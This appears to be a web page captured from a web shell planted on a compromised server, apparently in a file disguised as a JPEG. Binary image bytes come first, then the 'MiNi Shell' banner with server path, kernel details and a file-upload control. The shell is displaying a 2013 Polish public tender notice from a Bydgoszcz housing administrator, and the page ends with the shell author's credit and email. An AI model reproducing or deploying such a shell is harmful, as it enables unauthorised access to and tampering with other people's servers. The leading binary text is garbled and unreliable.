JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130312/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130312/98144-N-2013.html

<p class="kh_header"><b>Bydgoszcz: 21/P/2013</b><br>
<b>Numer ogłoszenia: 98144 - 2013; data zamieszczenia: 12.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 21/P/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej  dla Administracji Domów Miejskich ADM Sp. z o.o..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  posiadania wiedzy i doświadczenia zostanie spełniony jeśli Wykonawca wykaże, iż w okresie  ostatnich 3 lat przed  dniem wszczęcia  postępowania  o udzielenie  zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował należycie zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia  (odpowiednio dla zadania)  tj.  WYKONAŁ : 
1)dla zadania nr 1 -  co najmniej 1  (słownie: jeden)  projekt budowlany dotyczący wzmocnienia elementów konstrukcyjnych budynku np. ścian, więźby dachowej, fundamentu budynku mieszkalnego lub użytkowego,
2)dla zadania nr 2 - co najmniej 1  (słownie: jeden) projekt budowlany dotyczący wydzielenia pomieszczenia higieniczno-sanitarnego w budynku
3)dla zadania nr 3 -  co najmniej 1  (słownie: jeden)  projekt budowlany dotyczący wzmocnienia elementów konstrukcyjnych budynku np. ścian, więźby dachowej, fundamentu budynku mieszkalnego lub użytkowego,
4)dla zadania nr 4 -  co najmniej 1  (słownie: jeden)  projekt budowlany dotyczący wzmocnienia elementów konstrukcyjnych budynku np. ścian, więźby dachowej, fundamentu budynku mieszkalnego lub użytkowego,
5)dla zadania nr 5 -  co najmniej 1  (słownie: jeden)  projekt budowlany dotyczący remontu  (przebudowy lub rekonstrukcji)  elewacji budynku  
6)dla zadania nr 6 -  co najmniej 1  (słownie: jeden)  projekt budowlany dotyczący wykonania instalacji domofonowej dla budynku mieszkalnego objętego nadzorem konserwatora zabytków
7) dla zadania nr 7 -  co najmniej 1  (słownie: jeden)  audyt energetyczny budynku wykonany  zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 17 marca 2009 r.  w sprawie szczegółowego zakresu i form audytu energetycznego oraz części audytu remontowego, wzorów kart audytów, a także algorytmu oceny opłacalności przedsięwzięcia termomodernizacyjnego  (Dz. U.  z 2009r.,Nr 43, poz. 346). 
8)dla zadania nr 8 -  co najmniej 1  (słownie: jedną)  inwentaryzację konserwatorską budynku, pozytywnie zaopiniowaną przez konserwatora zabytków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia   zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje minimum :
1)  dla zadania 1: 
-jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności  konstrukcyjno - budowlanej , zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2010r., Nr 243, poz. 1623 tekst jednolity ) lub odpowiadając im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa
2)  dla zadania 2 :
-jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności  konstrukcyjno - budowlanej , zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2010r., Nr 243, poz. 1623 tekst jednolity) lub odpowiadając im uprawnienia wydane na podstawie wcześniej  obowiązujących  przepisów prawa   oraz
-  jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej               w zakresie sieci , instalacji , urządzeń wodociągowych i kanalizacyjnych -  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U.  z 2010r., Nr 243, poz. 1623 tekst jednolity ) lub odpowiadając im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa.
3) dla zadania 3: 
- jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności  konstrukcyjno - budowlanej , zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2010r., Nr 243, poz. 1623 tekst jednolity) lub odpowiadając im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa
4)   dla zadania 4: 
-  jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności  konstrukcyjno - budowlanej , zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2010r., Nr 243, poz. 1623 tekst jednolity ) lub odpowiadając im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa
5)   dla zadania 5: 
-  jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności  konstrukcyjno - budowlanej , zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2010r., Nr 243, poz. 1623 tekst jednolity) lub odpowiadając im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa
6)dla zadania 6: 
-  jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych elektronicznych , zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2010r., Nr 243, poz. 1623 tekst jednolity ) lub odpowiadając im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa
7) dla zadania 8: 
- jedną osobą, która wykonała inwentaryzację konserwatorską pozytywnie zaopiniowaną przez konserwatora zabytków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) W celu wykazania spełniania warunków udziału w postępowaniu określonych w art. 22 ust 1 ustawy Pzp - Wykonawca  składa  wraz z ofertą  niżej wymienione  dokumenty i oświadczenia 1. oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu - według wzoru stanowiącego  załącznik nr 3 do SIWZ  
2.wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy -   w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi  zostały wykonane - według  wzoru stanowiącego załącznik  nr 5  do  SIWZ  oraz załączenie dowodów, czy zostały wykonane lub są wykonywane należycie.
3. oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia  posiadają  wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - według  wzoru  stanowiącego  załącznik  nr 6  do SIWZ ,  
4. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie  czynności oraz informacją o podstawie  dysponowania tymi osobami - według wzoru stanowiącego załącznik nr 4 do SIWZ  
UWAGA:
-w przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa  w pkt.7.1.2. SIWZ ,  zostały  wcześniej wykonane,  wykonawca nie ma obowiązku przedkładania dowodów,
-wykonawca w miejsce dowodów (poświadczeń), o których mowa w par.1 ust.2 pkt.1  Rozporządzenia  Prezesa Rady Ministrów  z dnia 19.02.2013 r.  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane - Wykonawca może przedkładać dokumenty potwierdzające należyte wykonanie dostaw, określone w par.1 ust.1 pkt.3  Rozporządzenia Prezesa Rady Ministrów  z dnia 30.12.2009 r.  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane.
2)W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia  w okolicznościach, o których mowa  w art. 24  ust.1  ustawy Pzp należy przedłożyć : 
1.  oświadczenie  o niespełnieniu przesłanek  do wykluczenia z postępowania - według wzoru stanowiącego  załącznik  nr 4 do  niniejszej SIWZ   
UWAGA:
-  w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców (np. konsorcjum, spółka cywilna ) do oferty muszą być załączone wszystkie  wymienione dokumenty, o których mowa  w pkt.7.2. SIWZ -  wystawione  osobno  dla  każdego  Wykonawcy   (członka  konsorcjum, wspólnika spółki cywilnej  itp.).  
W związku z powyższym dokumenty w celu wykazania braku podstaw do wykluczenia z postępowania - muszą złożyć oddzielnie wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia  np.  wszyscy uczestnicy konsorcjum lub wspólnicy spółki cywilnej.   
Dla przykładu: nie jest więc skuteczne złożenie przez konsorcjum lub spółkę cywilną  jednego wspólnego oświadczenia o nie podleganiu wykluczeniu z postępowania. Każdy ze wspólników/uczestników spółki cywilnej/konsorcjum  musi przedłożyć oświadczenie, dotyczące wyłącznie jego osoby. 
3)Ponadto  wykonawca  zobowiązany  jest  złożyć  wraz  z  OFERTĄ  następujące  dokumenty :
1.  listę  podmiotów należących do tej  samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt.5, albo informacje o tym,   że  nie  należy do  grupy  kapitałowej.
2.  w  przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach  innych  podmiotów  -  pisemne  zobowiązanie  innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania z nich przy wykonaniu zamówienia   (w  oryginale)
3.  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo o którym mowa  w  pkt.7.7. ust.1)  niniejszej SIWZ   (w oryginale lub notarialnie poświadczonej za zgodność  z oryginałem kopii )
4. w przypadku składania oferty przez pełnomocnika Wykonawcy - pełnomocnictwo do reprezentowania wykonawcy przez Pełnomocnika  (w oryginale lub notarialnie poświadczonej za zgodność   z oryginałem kopii )
5. Formularz oferty  - według  wzoru stanowiącego załącznik  nr 1 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z  art. 144 ustawy Pzp  Zamawiający przewiduje  możliwość  zmiany umowy w zakresie   i  przypadkach niżej określonych:  
1.Wynagrodzenie należne wykonawcy  podlega  automatycznej  zmianie do zmiany wysokości podatku VAT obowiązującej w chwili powstania obowiązku podatkowego. W takim przypadku wysokość wynagrodzenia należnego wykonawcy ustalana jest  każdorazowo z  uwzględnieniem  aktualnej  stawki podatku VAT obowiązującej  na dzień  wystawienia  faktury ( powstania  obowiązku podatkowego). W takich przypadkach zmiana  wynagrodzenia  należnego wykonawcy nie wymaga  złożenia  dodatkowego zgodnego oświadczenia  woli stron o ustaleniu tego wynagrodzenia w nowej wysokości , tj. nie jest  wymagane zawarcie aneksu do umowy. 
2. Zmiany terminu wykonania zamówienia w przypadku konieczności wydłużenia terminu realizacji umowy wywołanej ważnymi zdarzeniami niemożliwymi do przewidzenia w chwili podpisania umowy, o czas  nie dłuższy niż okres trwania przeszkód w realizacji umowy wynikających z ww. zdarzeń. W takim przypadku zmiana dokonuje się po pisemnym powiadomieniu Zamawiającego przez Wykonawcę o ich zaistnieniu - jednak nie później niż w dniu określonym w umowie na dzień zakończenia realizacji zamówienia  i  potwierdzeniu tych okoliczności przez Zamawiającego w formie spisanego na tę okoliczność  protokołu konieczności i zaakceptowanego przez strony. Zmiana terminu nastąpi  w drodze aneksu do umowy.
3.  W przypadku wystąpienia  okoliczności stanowiących podstawę  do zmian  postanowień umowy Wykonawca zobowiązany jest do niezwłocznego, jednak  nie później niż przed upływem terminu zakończenia realizacji zamówienia -  poinformowania  o tym  fakcie  Zamawiającego i  wystąpienia            o  dokonanie  zmian   w przedmiotowej  umowie .
4.Jeżeli  Zamawiający uzna ,że zaistniałe okoliczności stanowiące podstawę  do zmiany w umowie  nie są  zasadne, Wykonawca zobowiązany jest do realizacji zadania  zgodnie  z warunkami zawartymi w SIWZ  i  umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.adm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Domów Miejskich ADM Sp. z o.o.  Dział Zamówień Publicznych  85-005 Bydgoszcz  ul. Gdańska 9 ( 2 piętro , pokój 2)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2013 godzina 10:00, miejsce: Administracja Domów Miejskich ADM Sp. z o.o.  Dział Zamówień Publicznych  85-005 Bydgoszcz  ul. Gdańska 9 ( 2 piętro , pokój 2)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 21/P/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie projektu budowlanego dla budynku garażowo-magazynowego  przy ul. Stary Port 21.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 21/P/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie  projektu budowlanego na wydzielenie ustępu przy ul. Harcerskiej 15A i Harcerskiej 15C.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 21/P/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie  projektu budowlanego dla budynku mieszkalnego ( oficyny)  przy ul. Kościuszki 42 bl.1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 21/P/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie projektu budowlanego dla budynku Stary Port 21.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 21/P/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie projektu budowlanego na zmianę elewacji frontowej  budynku przy ul. Sienkiewicza 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 21/P/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie   projektu budowlanego  na wykonanie instalacji domofonowej dla budynku  frontowego i oficyny przy ul. Gdańskiej 63.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 21/P/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie audytu energetycznego dla budynku  użytkowego przy ul. Broniewskiego  1 ( pawilony handlowe).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> 21/P/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie  inwentaryzacji konserwatorskiej  piwnic  budynku przy ul. Jezuicka 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com